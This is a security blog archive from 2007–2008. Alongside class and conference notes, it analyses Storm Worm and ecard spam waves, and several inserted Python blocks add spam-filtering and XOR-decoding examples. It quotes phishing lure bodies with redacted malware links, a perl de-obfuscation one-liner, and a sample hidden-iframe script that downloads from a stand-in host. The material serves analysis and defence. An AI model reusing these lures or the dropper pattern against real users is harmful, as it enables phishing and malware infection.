Sunday, November 02, 2008

Security Visualization paper

I'm working on the paper I will deliver at SANS CDI, Visualization of Network Attacks.

I decided to visualize the classic Mitnick vs. Shimomura attack using DAVIX, Afterglow, and Graphviz' twopi. I generated connection data in CSV format based on Shimomura's excellent post mortem, which he posted to Usenet.

This image shows the connection between the source, destination, and TCP sequence number used in the attack. SYN packets are blue, the sole ACK (the forged connection from server to xterminal) is green.

Thursday, October 23, 2008

Out-of-cycle patch from Microsoft

Microsoft released MS08-067 as an emergency patch today. The Internet Storm Center has more information.

The big question I always ask with any MS patch is: is it 'wormable'? Could a self-propagating worm be written to exploit this vulnerability, and automatically infect remote systems? We haven't had a widespread one in a few years (going back to the Blaster and Sasser outbreaks).

Based on the patch MS08-067 replaces, MS06-040, my thinking is 'probably wormable'. A variant of the Mocbot bot/worm exploited MS06-040.

My advice: patch now.

Monday, October 20, 2008

SANS CDI Talk

Just a quick note to say I'll be delivering a talk at SANS CDI this December, titled Visualization of Network Attacks.

Sunday, October 05, 2008

CISSP in Pittsburgh

I just got back from teaching MGT 414 in Pittsburgh, PA. I taught on short notice, and didn't book my plane, etc., until 2 days before my flight.

I had never been to Pittsburgh before, so it was nice to check out the city. Steeler mania is certainly in full swing. I was also lectured on the wisdom of the Jason Bay trade by a cabbie (who took offense when I mentioned I 'missed' Manny). Both have been clutch in the postseason thus far, so I can't argue.

The nice thing about the Community SANS courses is the smaller classes allow a lot of networking between students.

I had a great time with the students; one student happened to live across the street from the hotel, and threw a dinner party for the class on Friday night. I can honestly say that a home-cooked meal is worth its weight in gold while on the road. Thanks, Nicole!

Sunday, August 17, 2008

Security 560 in Minneapolis

I just arrived in Minneapolis, and will be teaching SANS Security 560, Network Penetration Testing and Ethical Hacking, this week.

Tuesday, July 08, 2008

Going Independent

I recently left my full-time employer, and became an independent information security consultant.

Juggling my SANS teaching duties as a full-time employee had become very challenging, and I was faced with turning down teaching opportunities. Not something I was interested in doing, especially now that I've been given the opportunity to teach Ed Skoudis' excellent new Network Penetration Testing and Ethical Hacking course in Minneapolis.

Saturday, April 26, 2008

SANS Security West 2008

I'll be attending SANS Security West 2008 beginning May 11th, teaching MGT 414, SANS® +S™ Training Program for the CISSP® Certification Exam.

Friday, March 28, 2008

Lost Laptops Might Sink Ships


As part of my SANS Technology Institute MSISE degree program I gimp-ed a public domain World War II poster (with the famous catchphrase 'Loose Lips Might Sink Ships') to create an old-school laptop encryption security awareness poster titled 'Lost Laptops Might Sink Ships.'

I enjoyed creating this one, and plan to create a series of four security awareness posters.

http://www.sans.edu/resources/student_projects/

Saturday, March 22, 2008

The next SANS CISSP® @Home begins in August

Time flies! I just completed the most recent SANS MGT 414, CISSP® @Home class last Wednesday. I had a blast.

The next @Home class was just announced, beginning August 18th. Same as last time: 14 classes, running Mondays and Wednesdays from 7-10PM Eastern time.

http://www.sans.org/athome/details.php?nid=11734

Wednesday, February 06, 2008

Interview with Dr. Anton Chuvakin

Stephen Northcutt has an interesting interview with Dr. Anton Chuvakin regarding system logs, the bane of many a system admin's existence.

Saturday, December 22, 2007

Heap 'Off By 1' Overflow Illustrated

I delivered a presentation at SANS CDI 2007 last Sunday, titled Heap 'Off By 1' Overflow Illustrated. It was based on my GCIH Gold paper A Heap o’ Trouble, Heap-based flag insertion buffer overflow in CVS.

The attack is a few years old now, but the 'off by one' technique is interesting: the attacker has a single unaccounted 'M' at his/her disposal, and that is enough to seize control of program execution. The shellcode is dropped in one character at a time, by subverting the heap's unlink process. I was able to follow the attack, byte-by-byte, thanks to liberal use of libvoodo, and some perl scripts.

The attack's author, vl4d1m1r of Ac1dB1tch3z, wrote his own analysis earlier this year in Phrack 64.

Fellow SANS Technology Institute student Manuel Humberto Santander Pelaez also delivered a presentation at CDI 2007, on Antiforensics.

...Eric

Tuesday, November 20, 2007

Detecting Spam with Genetic Regular Expressions

My GIAC Certified Intrusion Analyst (GCIA) Gold paper was accepted today: Detecting Spam with Genetic Regular Expressions.

The concept behind the paper is to see if regexes may be 'evolved' via genetic algorithms to detect and block spam.

Short answer: it works. For more details (including POC code), check out the paper.

Many thanks to my GCIA Gold adviser Johannes Ullrich!

I'd love to hear any feedback on the paper.
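To make the idea concrete, here is a small genetic algorithm that evolves a regular expression to separate spam subjects from legitimate ones. This is an added illustration written for this page, not the proof-of-concept code from the paper: the corpus of subject lines is constructed (in the style of the spam waves quoted elsewhere on this page), and the genome encoding, mutation operators and fitness weights are my own choices, not the paper's.

```python
import random
import re

# Constructed toy corpus (not from the paper): subject lines in the style of the
# spam waves quoted elsewhere on this page, plus a few benign subjects.
SPAM = [
    "You've received a greeting ecard from a friend!",
    "You've received a postcard from a colleague!",
    "Worm Activity Detected!",
    "Spyware Alert!",
    "Your privacy is no longer safe",
    "Happy 4th of July",
    "You are being watched online.",
    "Trojan Detected!",
]
HAM = [
    "Minutes from Monday's staff meeting",
    "Re: quarterly budget spreadsheet",
    "Happy birthday, see you at lunch",
    "Patch window scheduled for Saturday",
    "Your expense report was approved",
    "Lunch on the 4th?",
    "Photos from the party",
    "Re: access request for the build server",
]

# Building blocks the GA may splice together: every word of three or more
# letters seen in the spam corpus, plus a few generic regex fragments.
WORD_RE = re.compile(r"[A-Za-z]{3,}")
TOKENS = sorted({re.escape(w.lower()) for s in SPAM for w in WORD_RE.findall(s)}) + [r"\d+", "!", r"\byou"]

# A genome is a list of clauses; each clause is a list of tokens joined by ".*",
# and the regex is the alternation of the clauses.
def to_pattern(genome):
    return "|".join("(?:" + ".*".join(clause) + ")" for clause in genome)

def score(pattern, spam, ham):
    """Count spam subjects matched (true positives) and ham matched (false positives)."""
    rx = re.compile(pattern, re.IGNORECASE)
    tp = sum(1 for s in spam if rx.search(s))
    fp = sum(1 for h in ham if rx.search(h))
    return tp, fp

def fitness(genome, spam, ham):
    # Blocking legitimate mail is penalised twice as hard as missing spam;
    # a small per-token cost favours shorter regexes.
    tp, fp = score(to_pattern(genome), spam, ham)
    return tp - 2 * fp - 0.05 * sum(len(clause) for clause in genome)

def random_clause(rng):
    return [rng.choice(TOKENS) for _ in range(rng.choice([1, 1, 2]))]

def mutate(genome, rng):
    g = [list(clause) for clause in genome]
    roll = rng.random()
    if roll < 0.3 and len(g) < 6:
        g.append(random_clause(rng))                              # grow the alternation
    elif roll < 0.5 and len(g) > 1:
        g.pop(rng.randrange(len(g)))                              # drop a clause
    else:
        clause = rng.choice(g)
        clause[rng.randrange(len(clause))] = rng.choice(TOKENS)   # point mutation
    return g

def crossover(a, b, rng):
    # The child inherits a random subset of each parent's clauses.
    child = [c for c in a if rng.random() < 0.5] + [c for c in b if rng.random() < 0.5]
    return child or [rng.choice(a + b)]

def evolve(spam=SPAM, ham=HAM, generations=40, pop_size=40, elite_size=10, seed=1):
    """Return (regex, fitness) of the best regex found; deterministic for a given seed."""
    rng = random.Random(seed)
    # Seed the population with every single token as a one-clause regex, then random fill.
    population = [[[t]] for t in TOKENS]
    while len(population) < pop_size:
        population.append([random_clause(rng)])
    for _ in range(generations):
        population.sort(key=lambda g: fitness(g, spam, ham), reverse=True)
        elite = population[:elite_size]          # elitism: the best never get worse
        children = []
        while len(elite) + len(children) < pop_size:
            a, b = rng.sample(elite, 2)
            children.append(mutate(crossover(a, b, rng), rng))
        population = elite + children
    best = max(population, key=lambda g: fitness(g, spam, ham))
    return to_pattern(best), round(fitness(best, spam, ham), 2)

if __name__ == "__main__":
    pattern, fit = evolve()
    print(pattern, fit, score(pattern, SPAM, HAM))
```

Because the initial population contains every single token and the elite survives each generation, the evolved regex can never score worse than the best single token; on this corpus the fitness weights decide what "better" means, so a deployment would tune the false-positive penalty against the cost of blocking legitimate mail.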

Thursday, October 25, 2007

Community SANS Boston 2007 day 4

I'm blogging live from Community SANS Boston 2007.

Today we finished up the Crypto domain, and completed Operations Security. Loads of great comments from class. We discussed fairness (and legality) in regards to internet history searches. Many of us had been in the position where a manager will say "John Doe is wasting time on the internet: show me a history of his internet usage."

I believe that you don't use technology to solve a personnel problem. If an employee is 'wasting time' on the internet, they could be wasting time in other ways, such as on the phone, long breaks, playing games, etc. It's not a technology problem; it's a management problem.

If you were to discipline 'John' for non-business internet usage, you should ask yourself: how many other employees use the internet just as much (or more) for non business purposes? Are you holding them to the same level of scrutiny as you are holding John? If not, you may have legal issues.

Nick brought in a few books today, including the aforementioned The Code Book by Simon Singh. Also the classics The Cuckoo's Egg by Clifford Stoll, and The Art of Deception by Kevin Mitnick.

The Code Book opens with the story of Mary Queen of Scots: she was executed for attempting to overthrow the British throne and implement Catholic rule in Britain. Often left out of the history books is the fact that cryptanalysis led to her death: Queen Elizabeth was hesitant to execute her cousin until the proof of treason was revealed when Mary's encrypted letters were decrypted.

Wednesday, October 24, 2007

Community SANS Boston 2007 day 3

I'm blogging live from Community SANS Boston 2007. Right now the Red Sox are on, and winning game 1 of the World Series 6-1.

We started on the Crypto domain today; my favorite domain. The history of crypto is fascinating: the course of history has changed due to crypto. I recommended The Codebreakers by David Kahn to my students; it is a fantastic history of crypto, up through the late 1960s. The story of the Japanese Purple Machine is fascinating. Cracking the Purple machine saved untold thousands of lives, shaved years off World War II in the Pacific theater, led to a decisive victory in the Battle of Midway Island, and changed the course of the war.

Miguel, one of my students, recommended The Code Book by Simon Singh, and Cryptonomicon by Neal Stephenson. I have added them to my Amazon list.

Monday, October 22, 2007

Community SANS Boston 2007 day 1

Community SANS Boston 2007 began today; I thought day 1 went very well.

Mike, a gentleman who attended my Incident Handling/Hacker Techniques class last year, decided to pursue the CISSP® certification and attended this class. After earning his GCIH last year, he was promoted and now heads up a security team at his company. He decided it was time to round out his information security management knowledge. It's always great to see repeat students!

We have a great cross-section of industries represented in class, including some military and financial folks.

We covered the Access Control Systems & Methodology today. A universal point that came up today: access control is hard, and often thankless. We often see a litany of access requests, with many folks clearly requesting more access than is required. Users can be quite vocal when access is denied or limited, and we never hear "Great job on access control today! You really nailed it!!"

A few questions from today:

Q: Are the questions on the CISSP® in domain order, or randomized?
A: The questions are in random order.

Q: What are the new CISSP® experience requirements as of Oct 1st, 2007?
A: (ISC)2 now requires 5 years of experience in two or more domains in the Common Body of Knowledge (and you may subtract 1 year with a 4-year degree). This is a change from the old rules, which required 4 years of experience in one of the domains in the Common Body of Knowledge. See the new CISSP® experience requirements.

As an FYI, the next CISSP® @Home starts in January.

Monday, September 17, 2007

Community SANS Boston 2007

Community SANS Boston 2007 begins October 22nd. I'll be teaching MGT 414, SANS® +S™ Training Program for the CISSP® Certification Exam.

Looks like the next SANS CISSP® @Home will begin in late November. I'll post the schedule once it's official.

Thursday, September 06, 2007

Storm worm now warns of RIAA investigation

The latest change in the ongoing Storm Worm assault is email warning of RIAA investigations. Here are some Subject lines from this AM:
  • Subject: Big brother is watching you.
  • Subject: Careful, you.re being watched.
  • Subject: Do you know who is watching you?
  • Subject: The things you do online are being watched.
  • Subject: What you do online is no longer private.
  • Subject: You are being watched online.
  • Subject: Your Privacy is being violated
  • Subject: Your online activities are no longer safe.
  • Subject: Your online life is not private
  • Subject: Your privacy is no longer safe
There are various bodies; here's an example:
If you download music of other files, you're being tracked. The RIAA is after everyone they can find. Our program will eliminate any trace to you. Keep your right to privacy safe, and download our software for free.
The emails point to an IP address, suggesting you "Download Tor". The resulting webpage points to 'tor.exe', which Avira identifies as "Worm/Stom.tck".

Sunday, July 08, 2007

'Ecard' spams are now showing 'abnormal activity'

The 'Ecard' spams have now switched over to 'abnormal activity' spams. Here's a summary of the subject lines:
  • Subject: ATTN!
  • Subject: Alert!
  • Subject: Malware Alert
  • Subject: Spyware Alert!
  • Subject: Spyware Detected!
  • Subject: Trojan Alert!
  • Subject: Trojan Detected!
  • Subject: Virus Activity Detected!
  • Subject: Warning!
  • Subject: Worm Activity Detected!
  • Subject: Worm Alert!
  • Subject: Worm Detected!
Here's an example body:
-------------------------------------
Dear Customer,

Our robot has detected an abnormal activity from your IP adress
on sending e-mails. Probably it is connected with the last epidemic
of a worm which does not have official patches at the moment.

We recommend you to install http://XX.71.238.156/?7c634591933434671c16a2e59b1283bd17061a8 to remove worm files and stop email sending, otherwise your account will be blocked.

Customer Support
-------------------------------------

The exe on the linked site is now called 'patch.exe,' which is identified as 'Trojan horse TR/Small.DBY.DB' by Avira.
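Both the RIAA mailing above and this "abnormal activity" wave share two cheap-to-detect traits: a link whose host is a bare IP address rather than a hostname, and (at the end of the chain) an .exe download. The following is an added mail-filter sketch written for this page, not code from the blog: the subject list is taken from the lines quoted above, the sample messages are constructed, and the addresses 192.0.2.10 and 198.51.100.7 are documentation addresses standing in for the redacted ones.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Subject lines quoted on this page for the Storm Worm / "abnormal activity" waves.
CAMPAIGN_SUBJECTS = {
    "big brother is watching you.",
    "you are being watched online.",
    "your privacy is no longer safe",
    "spyware alert!",
    "worm activity detected!",
    "virus activity detected!",
}

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)

def find_ip_links(text):
    """Return every URL in text whose host is a bare IP literal instead of a hostname."""
    links = []
    for url in URL_RE.findall(text):
        url = url.rstrip(".,;:)\"'")          # drop trailing punctuation from the sentence
        host = urlsplit(url).hostname
        if host is None:
            continue
        try:
            ipaddress.ip_address(host)       # accepts IPv4 and IPv6 literals
        except ValueError:
            continue                         # an ordinary hostname; not what we look for
        links.append(url)
    return links

def classify(subject, body):
    """Return the reasons a message resembles these mailings (empty list = nothing seen)."""
    reasons = []
    if subject.strip().lower() in CAMPAIGN_SUBJECTS:
        reasons.append("known campaign subject line")
    ip_links = find_ip_links(body)
    if ip_links:
        reasons.append("link to bare IP address")
    if any(urlsplit(u).path.lower().endswith(".exe") for u in ip_links):
        reasons.append("executable download from IP address")
    return reasons

# Constructed sample messages in the style of the bodies quoted on this page.
SAMPLES = [
    ("Spyware Alert!",
     "Our robot has detected an abnormal activity from your IP adress.\n"
     "We recommend you to install http://198.51.100.7/?7c634591 to remove worm files."),
    ("Careful, you're being watched.",
     "The RIAA is after everyone. Keep your privacy safe: download http://192.0.2.10/tor.exe"),
    ("Minutes from Monday's staff meeting",
     "Notes are at https://intranet.example.com/minutes/2007-09-06.pdf"),
]

if __name__ == "__main__":
    for subject, body in SAMPLES:
        print(f"{subject!r}: {classify(subject, body) or 'clean'}")
```

The subject list alone is brittle, since these campaigns rotate subjects daily (as the posts here show); the bare-IP link is the more durable signal, and a mail gateway would typically quarantine on it rather than reject outright, because some legitimate internal notifications also link to raw addresses.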

Tuesday, July 03, 2007

4th of July ecard malware

The 'ecard' spam wave has been updated with 4th of July-themed subjects:
  • Subject: 4th Of July Celebration
  • Subject: America the Beautiful
  • Subject: America's 231st Birthday
  • Subject: American Pride, On The 4th
  • Subject: Americas B-Day
  • Subject: Celebrate Your Nation
  • Subject: Celebrate Your Independence
  • Subject: Fireworks on The 4th
  • Subject: Fourth of July Party
  • Subject: God Bless America
  • Subject: Happy 4th of July
  • Subject: Happy B-Day USA
  • Subject: Happy Birthday America
  • Subject: Happy Fourth of July
  • Subject: Independence Day At The Park
  • Subject: Independence Day Celebration
  • Subject: Independence Day Party
  • Subject: July 4th B-B-Q Party
  • Subject: July 4th Family Day
  • Subject: July 4th Fireworks Show
  • Subject: Your Nations Birthday
The Internet Storm Center has a writeup.

The malware is the same as the last wave. The index.html file contains an obfuscated hex-encoded payload. The current ecard.exe scans as 'TR/Small.DBY.DB' by Avira (the executable is updated frequently, in order to evade virus scanners).

Here's a sample email body:
-----------------------------------------------------------------------
Hi. Family member has sent you a greeting ecard.
See your card as often as you wish during the next 15 days.

SEEING YOUR CARD

If your email software creates links to Web pages, click on your
card's direct www address below while you are connected to the Internet:

http://XX.162.62.131/?32c3a9ebeed435601e5ee7

Or copy and paste it into your browser's "Location" box (where Internet addresses go).

PRIVACY
Postcard.com honors your privacy. Our home page and Card Pick Up have links to our Privacy Policy.

TERMS OF USE
By accessing your card you agree we have no liability.
If you don't know the person sending the card or don't wish to see the card, please disregard this Announcement.

We hope you enjoy your awesome card.

Wishing you the best,
Postmaster,
Postcard.com

Saturday, June 30, 2007

More greeting card spam

The greeting card spam wave continues. Subject lines vary somewhat; here's a sampling from today:
  • You've received a greeting card from a class-mate!
  • You've received a greeting card from a colleague!
  • You've received a greeting card from a family member!
  • You've received a greeting card from a friend!
  • You've received a greeting card from a neighbor!
  • You've received a greeting card from a school mate!
  • You've received a greeting ecard from a class-mate!
  • You've received a greeting ecard from a colleague!
  • You've received a greeting ecard from a family member!
  • You've received a greeting ecard from a friend!
  • You've received a greeting ecard from a neighbour!
  • You've received a greeting ecard from a partner!
  • You've received a greeting ecard from a worshipper!
  • You've received a greeting postcard from a colleague!
  • You've received a greeting postcard from a family member!
  • You've received a greeting postcard from a friend!
  • You've received a postcard from a class-mate!
  • You've received a postcard from a colleague!
  • You've received a postcard from a family member!
  • You've received a postcard from a partner!
  • You've received an ecard from a partner!
  • You've received an ecard from a worshipper!
They are now linking to IP addresses (as opposed to .hk sites in the early stages).

The Internet Storm Center has an excellent analysis.

Here's a sample 'index.html' file:


The hex code goes on for a while:


The file is obfuscated with XORed hexadecimal. The key in this case is '227' (it changes with each copy, for a simple form of polymorphism). This perl snippet will decode the XORed hex:

perl -e 'while(<>){s/\\x([a-f0-9]{2})/chr(227)^pack("C",hex($1))/egi;print;}'


If you are analyzing a copy of your own, change the '227' in the perl code to match the key used in that index.html file.
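Since the key changes with each copy, it is worth automating the guess rather than reading it out of the file by hand. The following is an added Python version of the same decoding step, written for this page rather than taken from it: it performs the XOR the perl one-liner performs, and additionally brute-forces the single-byte key by trying all 256 values and keeping the one whose output contains familiar HTML/JavaScript markers and is mostly printable. The script fragment and the address 192.0.2.5 are constructed stand-ins, not the real index.html content.

```python
import re

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")

def unescape(obfuscated):
    """Turn a run of \\xNN escapes into the raw (still XORed) bytes."""
    return bytes(int(h, 16) for h in HEX_ESCAPE.findall(obfuscated))

def xor_hex_decode(obfuscated, key):
    """The operation the perl one-liner performs: XOR every decoded byte with key."""
    return bytes(b ^ key for b in unescape(obfuscated)).decode("latin-1")

def xor_hex_encode(plain, key):
    # Only used here to build the constructed sample; the real pages arrive already encoded.
    return "".join("\\x%02x" % (ord(c) ^ key) for c in plain)

def recover_key(obfuscated, markers=(b"<script", b"http://", b"document.write")):
    """Brute-force the single-byte key: prefer candidates that contain the
    expected HTML/JS markers, then those that are mostly printable ASCII."""
    raw = unescape(obfuscated)
    best_score, best_key = None, None
    for key in range(256):
        cand = bytes(b ^ key for b in raw)
        hits = sum(m in cand.lower() for m in markers)
        printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in cand) / len(cand)
        if best_score is None or (hits, printable) > best_score:
            best_score, best_key = (hits, printable), key
    return best_key

# Constructed sample: a stand-in for the kind of script the page describes, not the
# actual index.html; 192.0.2.5 is a documentation address, not the real dropper host.
SAMPLE_JS = ('<script>document.write("<iframe src=http://192.0.2.5/file.php '
             'width=0 height=0></iframe>")</script>')
SAMPLE_BLOB = xor_hex_encode(SAMPLE_JS, 227)   # 227 is the key quoted on the page

if __name__ == "__main__":
    key = recover_key(SAMPLE_BLOB)
    print("recovered key:", key)
    print(xor_hex_decode(SAMPLE_BLOB, key))
```

The marker list is the analyst's prior about what the plaintext should look like; for a dropper page, a `<script` tag or a URL is a safe bet, and the printable-ratio tie-breaker handles copies where no marker happens to be present.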

The de-obfuscated code looks like this:


Among other nastiness, it retrieves the file http://XX.252.250.104/file.php, which is really a Windows executable that BitDefender identifies as: "Generic.Malware.dld!!.2526793B"